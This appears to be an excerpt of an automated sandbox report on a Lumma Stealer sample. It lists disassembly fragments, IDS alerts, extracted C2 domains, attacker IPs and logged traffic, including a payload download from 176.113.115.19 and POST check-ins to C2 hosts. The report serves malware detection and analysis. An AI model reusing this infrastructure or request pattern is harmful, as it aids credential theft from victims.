                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp eax3_2_024B6739
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_024A77E9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then jmp ecx3_2_024CC79B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, eax3_2_024B7797
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_024B54D1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebx, edi3_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_024A554C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_024A6544
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024B552B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_024B559D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024B55B3
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0249DA09
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0249DA09
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0249EAA2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, di3_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_024C3897
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024A6907
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov eax, edx3_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_024B89C0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_024CA9DE
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_024A5F79
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_024CCFC7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_024B9C17
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_024AEC17
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_024C6C3B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov esi, eax3_2_024B3C9B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CAD19
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_024CCD87

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.10:63742 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.10:49736 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.10:60706 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.10:50695 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.10:56891 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.10:57774 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.10:58446 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.10:51525 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.10:55967 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.10:49736
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.10:49748 -> 104.131.68.180:443
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.10:54262 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.10:49748
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49736 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49736 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49748 -> 104.131.68.180:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49756 -> 104.121.10.34:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49748 -> 104.131.68.180:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 08:42:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 08:30:02 GMTETag: "59c00-629731a74cc27"Accept-Ranges: bytesContent-Length: 367616Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e8 6d 86 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f6 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 0a f3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 29 04 00 3c 00 00 00 00 10 42 00 a8 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f5 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e 23 00 00 00 10 04 00 00 24 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc c4 3d 00 00 40 04 00 00 70 00 00 00 1e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 0c 01 00 00 10 42 00 00 0e 01 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox ViewIP Address: 45.77.249.79 45.77.249.79
                  Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                  Source: Joe Sandbox ViewIP Address: 104.131.68.180 104.131.68.180
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49715 -> 176.113.115.19:80
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49736 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49756 -> 104.121.10.34:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49748 -> 104.131.68.180:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49709 -> 104.21.56.70:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2ea280fd0ecd38148ff05529; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 08:42:59 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
